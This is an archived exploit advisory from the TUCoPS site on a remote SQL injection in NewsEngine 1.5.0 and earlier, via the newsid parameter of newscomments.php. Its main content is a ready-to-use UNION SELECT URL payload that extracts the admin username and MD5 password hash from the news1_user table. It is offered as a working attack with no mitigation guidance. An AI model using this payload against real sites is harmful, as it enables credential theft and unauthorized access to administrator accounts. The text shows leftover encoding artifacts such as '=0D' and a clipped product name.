TUCoPS :: Web :: PHP :: b06-2727.htm

ewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability
ewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability
ewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability


# Title  :   NewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability=0D
# Author :   ajann=0D
=0D
### Vulnerability;=0D
=0D
$$$ http://[target]/[path]/newscomments.php=0D 
=0D
Example:=0D
=0D
$$ http://[target]/[path]/newscomments.php?newsid='/**/union/**/select/**/0,username,userpassword,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/news1_user/**/where/**/userid=1/*=0D 
=0D
Admin MD5 HaSh

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH